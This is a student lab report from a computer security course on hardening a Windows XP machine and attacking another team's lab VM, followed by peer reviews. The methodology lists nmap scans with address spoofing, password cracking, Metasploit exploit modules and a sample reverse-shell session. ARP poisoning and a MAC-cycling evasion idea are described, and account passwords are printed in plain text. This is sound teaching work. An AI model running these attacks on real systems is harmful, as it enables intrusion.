Abstract
There is a fine line between securing a system and maintaining that system's usability. A system can be secured to the point of being nearly impenetrable, but doing so can drastically reduce its ability to accomplish the tasks it is needed for. In this final lab for the class, the team will take the computer that was created in the first lab and harden it using a NIST (National Institute of Standards and Technology) document. In the second part of the lab, the team will attempt to penetrate another team's computer and implant a text file in the root drive of that system announcing the success. Forensic evaluations will be performed on systems that have been compromised, and an explanation of all the attacks will be recorded.
Literature Review
The literature assigned for this lab is connected to forensics and penetration testing. These papers discuss proposed courses that teach how to detect malicious attacks and how to analyze existing software to discover malicious activity. The articles also cover automated systems that perform penetration testing, as well as an overview of forensics. There is also an article on preventing blackbox testing. Together, these articles help in obscuring and analyzing the attacks that will be performed in this lab.
In Defense of the Dark Arts (Bailey, Coleman, & Davidson, 2008), the writers propose a college course on computer security and defense. The writers first proposed a course that teaches how computer viruses are written, but because of controversy over teaching students how to write malicious code, they settled on a course that teaches how to defend against malicious software. Teaching students how to write malicious software should not be given up completely, though: if a student knows how a piece of malicious software is written, then the student knows what to look for when auditing software and how to defend against it better. In the abstract the writers keep referring to a compiler course, but they never explain it; they should either have given a brief explanation of this course or left the reference out. The writers explain in the introduction that the course goes beyond the pattern recognition that anti-virus software has traditionally used and studies program analysis. The course teaches two key concepts: computer security and software analysis.
To test how effective the course would be, the writers offered it at two colleges and studied the reaction of the computer science departments and students. One was a large research university and the other a small private liberal arts college. The course was based on a machine-language evaluation course, so the tools used in the course had to be made from scratch. The course uses the Phoenix compiler developed by Microsoft as the machine-code compiler. The instructors teach the mechanisms of how a virus works without teaching how to write the malicious code, using fragments of DOS-era viruses to teach the structure of viruses. Using DOS-era virus fragments does not allow modern malicious scripts, which are written in many other languages and environments, to be examined. The students do learn how to detect malicious software through pattern recognition. The paper goes on to show different concepts that would be taught in the course, with examples. One idea the writers introduce is obfuscating code by inserting random code that accomplishes nothing in order to break the patterns that anti-virus software would detect.
The university where the course was given was the University of Virginia. There the course was set up with a capacity of 50 students, each given a Windows XP machine with Cygwin (including lex), the Phoenix compiler suite, and Microsoft Virtual PC. The virtual environment was set up as a security measure. The students showed particular enthusiasm for the Phoenix assignments, so part of the course was revised to incorporate more of them. After further refinement, the class was given again a couple of years later and was at least as popular as before. The writers did not mention how the students performed in the course, though. The second college was a private liberal arts college, Hamilton College. This college was more selective in its admissions, so it was much smaller and the course had fewer students, who also did not have as much training as the students at the university. The writers seemed to drop the ball on this part of the paper: they did not mention any results of teaching the course at Hamilton College, so there were no results from that study.
In the prior work section of the paper, the writers justify their decision not to teach how to write malicious code. They mention that the techniques taught in their course apply not only to analyzing malicious software but to other types of software as well. This paper shows how courses in studying malicious activity are beginning to be developed to counter the widespread threat to computer security. The class that this lab is part of is similar in that it teaches students how malicious attacks happen and also how to use those attacks to perform penetration tests on systems before they are compromised by someone with malicious intent. All courses of this type should consider teaching the material in this way. Doing so would increase awareness of malicious activity, make such activity riskier for the attacker, and decrease the amount of it occurring in the real world.
Like the previous article, Cyberattacks: A Lab-Based Introduction to Computer Security (Holland-Minkley, 2006) proposes an introductory course in computer security. This course introduced students to real malicious software in a controlled environment to teach them technical knowledge about computer security. The writer explains that the government is encouraging colleges to create courses like this to raise awareness of computer security, and that most courses built around this concept focus on security professionals rather than the general public. The proposed course is made for non-majors or students just beginning a major or minor. It teaches the various types of malicious activity found on the internet, the properties of networks and computer systems that make an attack possible, the impact of an attack on a system, and how to maintain a computer so that it is more secure against today's attacks. Because the course also covers the structure of networks and computers, it makes non-technical users more aware of how computers can be compromised and gets them thinking about how to keep their own computers more secure.
The school that gave this course took great care to keep the computers involved isolated from the rest of the campus because of the malicious software that would be introduced onto them. The course was divided into two tracks: one discussed the history of malicious attacks and the ethical and social issues of computer science, and the other was lab-based learning about security attacks and how to recover from and prevent them. At the end of the course, pairs of students had to write a research paper on a question similar to those given in the course; the article gives examples of some of the papers that were written, and the research also included a poster.
The writer then evaluated the students who took the course, looking at data gathered from the course and surveying the students before and after it. The course generated a very high level of enthusiasm and attracted many students outside the IT field. Surveys given on the first and last days of the course measured the students' knowledge of and attitude toward computer security. The results did show a large increase in awareness and knowledge of the different types of malicious activity. The paper also shows, however, that when students were surveyed about how often they performed specific activities, like updating the operating system, clicking on pop-ups, and downloading music, their behavior did not change very much. A survey of students' attitudes about how hard it is to detect malicious activity showed a small increase in knowledge of how to detect and remove malicious software after the course. Follow-up surveys were also given to the students over the following year.
This article was very similar to the Defense of the Dark Arts (Bailey, Coleman, & Davidson, 2008) article. Like the other, it proposes a class on teaching defense against cyber attacks, but it targets people starting in the IT field and people outside it, whereas the class this lab is associated with is meant for more advanced individuals in the IT field.
The fact that most classes dealing with malicious attacks and software are aimed at individuals with advanced knowledge of computer science does not mean there should not be classes for those with less knowledge in the IT field. This subject should be known to everyone who uses a computer: the more people who are knowledgeable about this material, the harder it will be for attackers to compromise systems.
Automated systems are being created to automate penetration testing. The article Breaking Blue: Automated Red Teaming Using Evolvable Simulations (Upton, Johnson, & McDonald, 2004) is a continuation of a larger project in manual red teaming. It introduces and proposes a part of the project called AutoRedTeaming, which uses algorithms and simulations to try to overcome a security system. The paper opens with background on the concept of red teaming; the explanation is good but very broad. The article explains that the project is developing an automated system that uses evolutionary algorithms and agent-based simulations to overcome proposed security procedures represented by a blue team. The paper then describes how the scenario was set up and how the first simulation of the automated red teaming program was run, but it gives only a brief explanation of the setup and no results from the tests. A very similar project was covered in lab two's literature review, Automated Red Teaming: A Proposed Framework for Military Application (Seng, Lian, & Su-Han Victor, 2007). That team revealed they were limited in generating solutions using only the parameter settings of the agents, and they are examining the idea of changing the simulation agents' structures to overcome this obstacle; they propose using the automated system to evaluate potential threat tactics. This idea of automated red teaming can be used as a first step, but it should never be the only step in determining threats against a system. Automated red teaming could be incorporated into cyberwarfare as programs that perform automated penetration tests of a system. Again, this should not be the only step in a penetration test, but it could expose the most obvious vulnerabilities. Some situations cannot be tested with an automated penetration program at all, for example, social engineering attacks against an organization.
Forensics can be used to analyze the integrity of a penetration test. In the article Investigating Sophisticated Security Breaches, Eoghan Casey gives an overview of what forensics comprises and the limitations that affect its effectiveness. The author points out that most organizations are not properly configured to conduct a forensics operation (Casey, 2006, p. 50). However, this was not the case in the lab environment set up by team four with the aid of a NIST document; the team set up several logs because a full-blown siege was known to be underway. The author describes anti-forensics techniques such as deleting logs, altering date and time stamps, or installing utilities such as rootkits to subvert the operating system, techniques that were encouraged in the laboratory assignment (Casey, 2006, p. 49). If a team clearly saw that an attack was underway, it could contact the professor and have its system taken offline for a few hours. The article appears to be a secondary source, for it addresses its topic by analyzing what others have said about the subject.
The next article continues the subject of obscuring testing by denying blackbox tests. In A Protocol Preventing Blackbox Tests of Mobile Agents, Fritz Hohl and Kurt Rothermel describe ways to prevent blackbox testing on systems that are blackboxes. The authors define blackbox systems as systems whose internal code and data are invisible to attackers (Hohl & Rothermel, 1999, p. 2). The article describes two basic ways to prevent blackbox testing: avoid the occurrence of a series of input events that has already been executed, or allow a series of input events that has been executed before but require it to produce the same results (Hohl & Rothermel, 1999, pp. 4-5). The article uses a few case studies to explain how blackbox testing would or would not work in the given scenarios. It is somewhat hard to follow, and it proposes a registration protocol that accepts unknown interactions and allows the agent to continue execution (Hohl & Rothermel, 1999, p. 7). In this lab exercise, the teams' virtual machines are like the agents described in the article: the attacker hits the agent with some sort of input, via a command from a command prompt or a tool run against the agent, to create a response or output. In the case of this lab, however, the teams are not concerned with whether the attacker used the same input technique repeatedly, but with making sure that enough services have been disabled that the system gives back useless data or no data at all to the attacker.
Methodology
The purpose of this lab was to create a system that would be as secure as the rules of the lab permitted. For the second part of the lab, the team would attempt to penetrate one opposing team's system to see if a file could be implanted in the root of that system without being discovered. To accomplish the first part of the lab, the team chose the Windows XP SP3 VM to harden. The team then acquired NIST document SP 800-68 and the policy template that accompanies it. Following each step outlined in the document, the team hardened the system and applied the accompanying security template. The team changed some of the policies outlined in the NIST document to fit the system to the scenario of this lab. The changes the team made to the NIST policies included the following (a command-prompt sketch of several of these changes appears after the list):
- Disabled file and print sharing.
- Uninstalled as many applications as possible.
- Turned on Windows XP’s firewall.
- Set the account lockout duration to 0 (locked until an administrator unlocks it).
- Set the account lockout threshold to 3 invalid attempts.
- Set the account lockout counter to reset after 30 minutes.
- Disabled, renamed, and changed the password of the guest account.
- Deleted all the accounts except the administrator account, user account, and the guest account.
- Set interactive logon to not display the last user's information.
- Retained the application, security, and system logs for 5 days.
- Set up an account for the professor to access using remote desktop.
- User name: Liles
- Password: Ubermeister_581
- Renamed the administrator account, changed the password, and disabled the account
- User name: the_god_account
- Password: Ober_Ritter_353
- Changed the user account’s password
- User name: user
- Password: Hummels_Mund_353
- Changed the VM's internal IP address from 192.168.4.1 to 192.168.4.44; the externally visible IP address of this team's system on the lab network was 205.215.116.33.
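As an illustration only, and not a transcript of the team's actual procedure, several of these changes could be made from a Windows XP command prompt as sketched below. The account names and addresses are the ones listed above; the connection name "Local Area Connection" is an assumption about this VM's configuration:

    rem Enable the built-in Windows XP firewall and log dropped packets
    netsh firewall set opmode mode=ENABLE
    netsh firewall set logging droppedpackets=ENABLE

    rem Disable the guest account and create the professor's remote desktop account
    net user guest /active:no
    net user Liles Ubermeister_581 /add
    net localgroup "Remote Desktop Users" Liles /add

    rem Change the VM's internal IP address
    netsh interface ip set address name="Local Area Connection" static 192.168.4.44 255.255.255.0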
The system was turned on at 5:00 p.m. on Wednesday, July 22, 2009, to be penetrated by the opposing teams, and was kept online (because of a penalty on this team) until 5:00 a.m. on Sunday, July 26, 2009. After the attacking session was over, the system was evaluated to determine whether it had been penetrated. This was done by looking for a file, left by the opposing team, stating that they had accomplished the penetration and giving the date and time. This team was given the IP address 205.215.116.44 as the target for its penetration test against team five.
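As a sketch, a check of this kind can be performed from a command prompt by listing the root of the drive with hidden and system files included:

    rem List everything in the root of C:, including hidden and system files
    dir C:\ /a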
For the attack against the opposing team, this team performed the attacks listed below, along with some others that are not itemized:
- Wireshark
- Passive reconnaissance
- Network traffic was monitored with filters to watch
- The system that this team was trying to penetrate
- The opposing team that was attacking this team’s system
- Undetermined systems that were performing scans against this team's system and related systems.
- p0f
- Passive reconnaissance of the target system using the following commands (-i selects the capture interface; -p enables promiscuous mode):
- p0f -i eth0 -p -S -r
- p0f -i eth0 -w /root/p0flog -p -s
- EzPWN
- Active reconnaissance of the target system, with exploit attacks if a vulnerability was discovered. The commands were set up as follows:
- EzDB AutoPwn
- EzP0f -eth0, verbose, detect masquerade, full dump
- EzNmap TCP connect(), Verbose, Don't Ping, Only open ports
- EzAmap ports 1 – 2000
- EzHalbred -verbose -threading
- Nmap
- Active reconnaissance of the target system with the following commands (-sV probes service versions; -O attempts OS fingerprinting; -T sets the timing template, from Paranoid to Insane; -sS, -sW, -sX, -sA, and -sU select SYN, Window, Xmas, ACK, and UDP scans respectively; -S spoofs the source address; -PN skips ping-based host discovery; -A enables aggressive all-in-one detection):
- nmap -sV -T Paranoid -sW -S 205.215.116.44
- nmap -sU -O 205.215.116.44 -e eth0 -PN
- nmap -T Insane -sV -sW -O 205.215.116.44
- nmap -T Paranoid -sV -sU -sA -O 205.215.116.44
- nmap -T Insane -sV -sU -sS -O 205.215.116.44
- nmap -T Aggressive -A -v 205.215.116.44
- nmap -T Insane -sV -sX -O 205.215.116.44
- Ettercap
- Passive reconnaissance of the target system with the following command (-C launches ettercap's curses interface):
- Ettercap -C
- Watched for 205.215.116.44 to appear and give us any information.
- Nessus scan using the most up-to-date plug-ins
- Command-prompt TCP/IP commands
- Nbtstat
- Net use
- Third party remote login utilities using password crackers
- Brutus
- Remote system information
- Zen commander
- Metasploit
- Exploits against possible vulnerabilities on the target system (a sketch of how one of these modules was launched appears after this list):
- Ms03-026
- Ms04-045-wins
- Ms03-049-netapi
- Ms08-041-snapshotviewer
- Ms08-053-mediaencoder
- Ms09-002-memory-corruption
- Gamesoft-telserv-username
- Goodtech-telnet
- Cain-abel-4918-rdp
- Cain and Abel
- Passive reconnaissance using ARP poisoning.
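As illustrations, and not a transcript of the actual sessions, here is a minimal sketch of how two of the tools above could be driven. A Wireshark display filter restricting the capture view to the target system's traffic:

    ip.addr == 205.215.116.44

A Metasploit console session launching one of the modules listed above against the target (the payload and its options are assumptions made for illustration):

    msf > use exploit/windows/dcerpc/ms03_026_dcom
    msf > set RHOST 205.215.116.44
    msf > set PAYLOAD windows/shell_reverse_tcp
    msf > set LHOST 205.215.116.33
    msf > exploit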
The team utilized the passive reconnaissance tools to discover any useful data leaving the target system and to identify the operating system it ran. This was done, at first, with as much stealth as possible, using IP address spoofing, ARP poisoning, and as much passive reconnaissance as possible. The team then reverted to outright aggressive active scans of the target system. After discovering only one open port, the team tried multiple exploits, using Metasploit and other third-party tools, to penetrate that port. Other exploits commonly used against Windows systems were also tried.
While this team was performing penetration tests on the target system, its own system was constantly monitored and logged. This involved monitoring the system, application, and security event logs, and copies of these logs were kept. The firewall logs were also monitored and were kept in an encrypted file on this team's system for future analysis. The team additionally used command-prompt commands to watch for changes on the network, for example in the ARP tables. Lastly, the root drive of this team's system was monitored for the file the opposing team was to leave declaring its success.
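As a sketch, the kind of command-prompt monitoring described above can be done with built-in Windows XP commands; the firewall log path shown is the XP default:

    rem Show the current ARP table, to watch for ARP poisoning
    arp -a
    rem List open connections and listening ports with owning process IDs
    netstat -ano
    rem Review the firewall's log of dropped packets
    type C:\WINDOWS\pfirewall.log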
Results
Upon examination of this team's system, analysis of the firewall logs revealed multiple active scans. All packets directed at this team's system were dropped by the firewall, and no exploits were discovered against it. The team that was attempting to penetrate this team's system declared a foul, stating that this team had put up a firewall after the second day of the penetration tests, which would be a violation of the lab rules. The opposing team asked the professor to investigate this team's system and determine whether the firewall had been put up late. The professor was not able to remotely log into this team's system because the remote desktop interface was disabled, so he requested that this team set up some means of remote login for him. This team then enabled the remote desktop interface and created an account for the professor to log into. Because the firewall logs had been kept, it was proven that the firewall was up before the penetration tests began.
Many passive reconnaissance tools were used to try to discover open ports on the target system and the operating system it ran. These passive scans revealed at first that no passwords or useful data were being passed from the target system, and the operating system could not be determined. Passive reconnaissance of the target system turned out to be of little help because of the lack of traffic from it: the target system was not being used as a normal system would be, so it produced almost no traffic.
After getting little to no results from passive reconnaissance, the team used active reconnaissance to discover any open ports and the operating system of the target. The team used multiple well-known tools, like Nessus and Nmap, to run active scans against the opposing team's system. At first these scans were done with as much stealth as possible: the team used spoofing to avoid giving away the IP address performing the scan, and scanned the target with a slow scan that is harder to detect. After being detected, the team reverted to aggressive active scans against the target system. After the second day, and after the team attacking this team's system cried foul, a port for remote desktop was discovered: port 3389, the default port for Windows Remote Desktop Protocol (RDP). The port was exposed but reported as closed. This team researched many exploits against port 3389 and tried multiple exploits and third-party programs to get into the target system through it, but this proved futile. Many other exploits common in a Windows environment were also tried. The opposing team detected some of these exploits, but none of them penetrated the target system.
After the penetration tests subsided, this team's system was analyzed for a file declaring that the opposing team had penetrated it. After looking throughout the whole system, not just the root, it was discovered that no such file existed. The team analyzed the event logs and the firewall logs and found many scans performed against this team's system, coming not from one IP address but from many different ones. The team also evaluated the system for attempted exploits but found none. In the end, this team was unsuccessful in penetrating the target system but successful in not being penetrated by the opposing team.
Issues
A few issues were encountered while conducting this laboratory exercise. The virtual machines were set up in a manner that did not resemble systems on a typical network: they did not produce traffic, did not contain users or applications, and were hardened to the point of becoming totally useless from a functionality standpoint. During the lab, team four was forced to change the remote login settings, which had been disabled in accordance with NIST guidelines, to a less secure configuration. This could have led to an opening for the attacking team to exploit.
Conclusion
After completing this laboratory assignment, team four has realized that operating systems themselves are not as inherently insecure as they are commonly made out to be. Without successful passive or active reconnaissance of the target system, it was difficult to launch attacks against it, for there were no criteria on which to base the attacks. The team realized that turning operating systems into bastions via hardening recommendations made the systems impervious to attack but sacrificed a large amount of functionality. The hardened systems did not represent a realistic scenario to test against: they were not set up with any applications beyond the necessary ones, and the applications found on a normal system would have opened ports an attacker could exploit. The hardened computers also produced no traffic that could be monitored. Such traffic, normally produced by internet browsing and file sharing, could be used by an attacker to gain the information needed to attack the system. This hardening makes the computer look like a standalone system. In general, it appeared that most of the teams were at a stalemate by the end of the laboratory exercise.
References
Bailey, M., Coleman, C., & Davidson, J. (2008). Defense against the dark arts. ACM.
Casey, E. (2006). Investigating sophisticated security breaches. ACM.
Hohl, F., & Rothermel, K. (1999). A protocol preventing blackbox tests of mobile agents.
Holland-Minkley, A. (2006). Cyberattacks: A lab-based introduction to computer security. ACM.
NIST. (2005). Guidance for securing Windows XP systems for IT professionals: A NIST security configuration checklist.
Upton, S., Johnson, S., & McDonald, M. (2004). Breaking blue: Automated red teaming using evolvable simulations.
As we all have learned throughout our undergraduate and graduate studies, you sacrifice security for usability. The abstract was not the required length as per the lab write-up given to us. BREAK UP YOUR PARAGRAPHS. Long paragraphs make it harder for the audience to read. Break them up.
The literature review was not cohesive in the least. It read like a list: the team just stated an article's name and then talked about the article. The professor told us numerous times NOT to do this. I don't know what comments the professor gave you about your lab reports, but I know he has told other teams numerous times not to do this. For such long paragraphs and summaries of the articles, the team did not put citations in their literature review. What is NIST? Before using an acronym you must spell it out.
I did not see the reasoning for putting the list of changes in the lab report; this was done in previous labs and was not needed again. I am pretty sure that the system was supposed to be taken down before 5 a.m. on Sunday. The team did not follow the guidelines at all. From what team 4 states, they made a change on the system after the window started. This completely violates the rules for the lab experiment, and team 3 had every reason to cry foul. The professor was not even able to log in to this team's system; the account should have been made and tested before telling the professor that it existed. This means, once again, that the team did not follow the rules. I believe that with these problems, team 4's lab report is invalid and nothing in it can be taken at face value or used for learning.
Team 4 was not able to be stealthy when trying to put a file on team 5's system; team 5 was able to detect the attempted attacks. Team 4 stated issues that were already known: these were not real systems because they had no traffic running on them. The question is, would running traffic make the systems more vulnerable? This team did not create a lab report that could be duplicated. The references were formatted oddly, and the required tags were not included in the submission of the lab report. Overall, this team did not follow many of the requirements of a lab report. I would say to change the formatting next time, but there is not another lab report in the future.
The final lab presented by team four suffers from the same two major problems that most of their other labs have suffered from. To begin with, the abstract is not the required length. It does explain the process to be completed by team four, but it is not the minimum two paragraphs long. The syllabus states that any abstract shorter than two paragraphs will be judged as poor scholarship.
The literature review provided by team four is also lacking; team four has had problems with their literature review since lab one. It is nothing more than a list of reviewed articles, a short explanation of each, and APA-style citations. The extremely long paragraphs make the review very hard to read and understand. I also see no link between the articles reviewed, or any indication of a connection to the steps of the lab process. By failing to create any measure of cohesion among the articles reviewed throughout the entire course, they force me to question the academic nature of their lab reports entirely, and their level of commitment to the graduate level of scholarship required in this course. Due to the size of the literature review paragraphs, I was not able to read completely through the review, as it was very easy to get distracted by the lack of any break in the writing.
Team four does a good job of explaining the how and the what of their methods section, like team three. They somewhat gloss over the who and the why, and completely miss the when and where. The point of an academic and scholarly methods section is to allow the experiment to be reproduced by any reader with the requisite knowledge; without direct and concise answers to who, what, where, when, why, and how, reproduction for validation of the experiment is not possible. In the methods section, I am forced to question the bullet point on changing the IP address, since it makes no sense to me: "Changed the IP address from 192.168.4.1 to 192.168.4.44 and the IP address on the network was 205.215.116.33." Was the IP address changed from 192.168.4.1 to .4.44 or to 205.215.116.33? This point makes no sense, and I question team four's understanding of IP networks.
The findings section gives an overview of the items team four found throughout the course of the lab. I agree with their findings, as they are valid and consistent with most findings reported by the other teams in the course. In the issues section, they list systems being hardened to the point of uselessness; I disagree with that issue. The VM locked down by team two was actually still very usable at the completion of the hardening step, and at the completion of the lab. The conclusions presented by team four say nothing about patch policy; with a good patch policy, automated exploits are generally almost impossible.
The abstract makes only passing mention of forensics. Since this lab is about forensics, or anti-forensics to be more precise, the activities of the lab should be related to anti-forensics. The literature review is, again, lengthy summaries of each of the assigned readings with little cohesion or comparison to the lab activities. One exception to this was the discussion of the red teaming paper assigned in lab two; this showed good research on team four's part. In addition to the summaries of the articles, team four does give their opinion on the content of the readings. The one paper that was tied to the lab activities was Eoghan Casey's paper on security breaches, though the team states that it seemed to be a secondary article. This particular reading was what lab seven was all about.
Team four's methodology described in detail the steps used to secure the machine and, unlike other groups, referenced the specific document that was used to select the security settings (though an APA in-text citation was not present). The attacking details were also very well documented as to the specific commands and tools used, but there was little detail or reasoning given for the specific exploits being attempted. The ordered lists are a good way of visualizing the various attack methods used but should be backed up with text describing the purpose of each attack. Also, the methodology frequently mentions "passive reconnaissance" being employed against the target system but gives no further detail. Is this simply packet captures?
I agree with the issue that the target machines weren't used enough to be considered "active," so they generated no network traffic. Had activity been a requirement, it would have been possible at least to determine the operating system and possibly the patch level. This same idea is echoed again in the conclusion. The group mentions the lack of usability of their system but never gives specifics about what was difficult to use on it. Judging from the security methods implemented, the system should still have been able to browse the web, access file shares on other computers, and run standard productivity applications.
Team 4 did a nice job with their abstract in that it discussed what they intended to do in lab 7, though more detail would have been beneficial. The introduction to their literature review gave a good summary of what the articles were about and how they related to lab 7. The literature review itself, however, read like a list and summary of the articles and didn't compare and contrast the literature with the lab activities.
The methods section is very detailed and does a good job of explaining how they planned to perform their testing. They did a really nice job of detailing their attacking methods; the way they listed the various attack methods helped me visualize what they were attempting to do.
I found team four's report for this exercise rather well done. The literature review was lengthy, and some issues noted in the previous exercise's review were corrected. Additionally, the review was more than just a summary of articles: some comparison among the articles was present, along with application to the exercise itself. The methodologies section was sufficiently detailed; I was left with few questions as to what this team had done or how it was accomplished. I also thought this team's idea of encrypting log files interesting, one which appeared to be a unique innovation that stood out from the rest of the teams.
A few issues do exist with the write-up, however. The literature review suffers from poor paragraph form: the massive paragraph style is still present from early writing and is difficult to read. Further, it seems some of the information in the results section should be in the methodologies section. I realize this appears to be an issue on which the parties critiquing the writing will never be satisfied, as no consistent opinion emerges. We as team three have, due to criticism, moved nearly all "action based" activities into the methodology section, and now receive complaints that items from the methodology section belong in results; so it truly may be a no-win situation for this team in this regard as well.
I must comment that I believe this team showed real effort in pursuing an attack against their target. I think this team realized, although it is not specifically mentioned, that very little was to be gained by using passive means against the target under the circumstances. This is especially apparent when the team switched from obfuscated scanning methods (such as IP spoofing) to direct attack. It seems other teams did not realize that the limitations of the environment also provided opportunity. For instance, a VM's MAC address could be changed at whim; coupled with the DHCP present on the network used for the exercise, IP addresses essentially became disposable. One could perform an active attack from one IP address with a VM, shut down and change the MAC configuration, and assume a new IP address identity on the network. This showed, as this team apparently realized, that no real gain was to be had from stealth in scanning or in attempting network-based exploits.
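As a sketch of this disposable-identity idea, and assuming VMware-style virtual machines, the MAC address can be pinned in the VM's .vmx configuration file and changed between runs; the address shown is an arbitrary example from VMware's static range:

    ethernet0.addressType = "static"
    ethernet0.address = "00:50:56:00:12:34"

On the next boot, the guest would request a fresh DHCP lease as an apparently new host.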
Finally, though I find the use of encryption for log files interesting, I wonder about the details of this arrangement. Did this team use the built-in Windows EFS? If so, due to the automatic use of the private keys associated with an account, this may have provided little additional security. See the description of the system here: http://technet.microsoft.com/en-us/library/bb457116.aspx . Specifically, if an attacker succeeded in gaining administrative privileges, and these log files were encrypted under that account, the attacker would have automatic access to them. A further consideration: Microsoft indicates substantial overhead exists in maintaining an "on the fly" encrypted file; this overhead, in conjunction with verbose recording settings, might have opened your system up to an externally induced logging denial of service. An interesting approach, nonetheless; I might investigate this matter further for practical application.
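For reference, here is a minimal sketch of how EFS encryption is applied and checked from a command prompt, using a hypothetical C:\logs folder:

    rem Encrypt the folder so files added to it are encrypted on the fly
    cipher /e C:\logs
    rem Display encryption status (E = encrypted, U = unencrypted)
    cipher C:\logs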
Team 4 begins their lab 7 report by discussing the tradeoff between security and usability. They then state their objectives for this lab. The first objective is to harden a system that they had created in lab 1 using a NIST document. The second objective is to attempt penetration on another team’s system. The third and final objective is to conduct a forensic evaluation of the system to determine any attacks which may have occurred.
Team 4 begins their literature review by stating that the assigned readings are connected to forensics on penetration testing. I believe this assessment is a bit too specific: although forensic evaluation is covered in the readings, the greater theme is securing systems. The first article that they review is Defense of the Dark Arts (Bailey, Coleman, Davidson, 2008). They describe this article as proposing a course on computer security and defense. Because of the controversy involved in the class, students were taught more from a defense perspective than an attack perspective. They relate this article to our current course in the way that it teaches defense from the perspective of the attacker.
The next article that they review is Cyberattacks: A Lab-Based Introduction to Computer Security (Minkley, 2006). They describe this article as teaching security from a defense perspective. They relate the article to Defense of the Dark Arts (Bailey, Coleman, Davidson, 2008), as both articles pertain to teaching how to defend a system; however, Defense of the Dark Arts is geared toward IT professionals. They defend the use of a system security class for non-IT professionals by stating that everyone who uses a computer should know how to defend it.
Team 4 continues their literature review with Breaking Blue: Automated Red Teaming Using Evolvable Simulations (Upton, Johnson, McDonald, 2004) and Red Teaming: A Proposed Framework for Military Application (Seng, Lian, Su-Han Victor, 2007). Team 4 takes the stand that automated red teaming can be used as a first step, but should not be the only method of analysis. I agree with this statement. A computer simulation cannot account for every possible way in which a system’s security can be breached. Human intervention is still needed for analysis.
Team 4 next reviews the article Investigating Sophisticated Security Breaches (Casey, 2006). They describe the article as giving an overview of system forensics and the limitations that impact its effectiveness. The article points out that most organizations are not properly configured to conduct a forensics operation. They relate this to our current lab assignment and explain how their own target system was set up to include several logging mechanisms.
The last article that Team 4 reviewed is A Protocol Preventing Blackbox Tests of Mobile Agents (Hohl & Rothermel, 1999). They describe the article as offering two methods to prevent an attempted penetration using blackbox testing. They relate the article to our current lab, as we are attempting to prevent penetration by outside intruders.
Team 4 begins their methodology section by restating the objectives of this lab: to attempt to penetrate an opposing team's system while defending their own. They state that they chose the Windows XP SP3 system to harden as their target system, using NIST document SP 800-68. Team 4 described several hardening methods they used in addition to those contained within the NIST document. They also described several methods used in attempting to penetrate the opposing team's system and give a good explanation of each.
In the results section Team 4 discusses the forensic evaluation of the system that they had set as a target. They detected numerous port scans of their system. They also mention that the team that was targeting their system questioned whether or not they had enabled a firewall during the exercise. Admittedly, some of the anomalous results of port scans may have been due to the massive amount of ARP poisoning and IP address spoofing that was occurring within the Citrix environment. Team 4 was able to prove that their system had the firewall enabled from the beginning of the exercise by the firewall logs.
Team 4 continues their results section by discussing their attempts to breach the system they were targeting. Passive reconnaissance methods proved unfruitful due to the lack of network traffic generated from the target machine. They used active reconnaissance methods in the use of port scanning and discovered port 3389 was open. They attempted several exploits on port 3389 but were unsuccessful in penetrating the target system. They do not include an explanation of the service that may be using port 3389.
Team 4 concludes by discussing how the target systems set up in this laboratory assignment were hardened to the point of being unusable. They conclude that operating systems left to themselves are secure; systems become insecure when applications and human intervention become involved. I agree with this assessment. Our own research through the various lab assignments has shown that security vulnerabilities come from the application layer of the OSI model, or from human interaction with the system.
The team starts off with their abstract for this lab and explains what is going to occur. The abstract was simple and to the point. They did make a brief point about how security affects usability, but it was one sentence, and the second sentence of the paragraph at that. This is an interesting subject that keeps recurring in security; the abstract would have been set up better if this had been clearly defined in the first sentence.
Next the team moves on to the literature review. Given how it is written each week, it is assumed that the peer reviews are not read by this group. The literature review was again broken apart by each individual piece of literature. There was a small paragraph at the beginning that described an overall combined subject of the papers; this should be expanded, with the literature used as stepping stones to discuss the topic. When reading the reviews, there is some discussion, but most of it is just regurgitating what the author wrote in a more condensed version.
Next the group moves on to the methodology section. Within this section they describe the steps they took to secure their machine, and then their plans to exploit team 5's machine, including the exploits they were going to use and the commands for each. The next section moves on to their findings. Within the findings section they described the attacks against the target system. They also listed an issue they had with a firewall on the target system; this should have been included within the issues and problems section. They go on to say that they tried to exploit one port that they found but were unsuccessful. Was the team looking for newer exploits beyond the ones already programmed into the tools they were using? Could this have changed the outcome?
They go on to give their issues and then conclude. In their conclusion, I agree that this is not a real representation of how systems are, as real users send and receive traffic more often. But this was also something to show how systems that are too secure give up usability, a lesson that can be applied in the workplace. Yes, companies want their systems secure, but at what cost before the system is unusable?
Team four’s abstract explains what will be done with the lab. It may be me, but something in the wording makes me uncomfortable. I can’t quite put my finger on it.
The team's literature review is verbose. It makes attempts to discuss the relevancy of the articles and even hints at evaluative thought, but misses the mark repeatedly. Did Bailey et al. really give up on examining viruses, or did they just integrate other things? What was the point of using DOS scripts? There was a reason. Holland-Minkley is one person; her whole last name is Holland-Minkley. Why do you think Upton et al.'s description of red teaming was so broad? Were they even really studying IT security, or was the idea a little more abstract? I didn't see any case studies in Hohl and Rothermel. Where were they?
The team’s methods are repeatable where hardening the machine is concerned. Why did you have to uninstall applications? There should have been nothing on the machine. Did you make the account lockout 0 or 3? You state that there was an account set up for the professor to access the system. Was this originally configured and presented to Professor Liles as the lab instructed, or did the team do this retroactively in response to complaints?
The attack plan is unclear. You list several tools but don’t explain how you used them in your attack plan. Is ARP poisoning really passive reconnaissance? Did you run this attack? If so, it may explain the confusion on the part of team five and two where exploiting team one is concerned.
The team has information in their findings section that belongs in methods. You explain what you attempted and why passive scanning does not work. You need more separation when discussing the two sides of the lab. It is hard to tell who is scanning what.
In your issues section you complain that you were forced to change settings. However, your inability to follow directions impacted the usability of your machine.
I think that group 4's write-up for lab 7 was poor. The abstract was adequate and provided a short overview of the lab. The literature review was good and adequately reviewed the material; the group answered all of the required questions for each reading, and all of the citing was done well, with all pages included. For this lab, the group answered all of the required questions and provided a good amount of detail about the steps they used to attempt to exploit a system. However, what they did was wrong. The group played around with a lot of tools that they shouldn't have unless they knew how to use them. As other groups have stated, it appears that a lot of ARP poisoning had been done (also indicated by IP conflicts), which wasn't needed; passive scanning can be performed in Ettercap without the need to poison. In fact, it could be detrimental to other groups: by performing MITM attacks, a DoS could have been brought about. Also, I think this is where our IP address mix-up came about; ARP poisoning can leave packets going to the "host in the middle" if targets are not re-ARPed correctly after poisoning. Did the group use an XP SP0 machine to perform the attacks? If so, this might give some speculation as to which virtual machine teams 2 and 5 ACTUALLY attacked. Overall, I feel that this lab was not performed correctly and COULD be to blame for the IP mix-ups. Finally, the conclusion was adequate and summarizes what was covered.
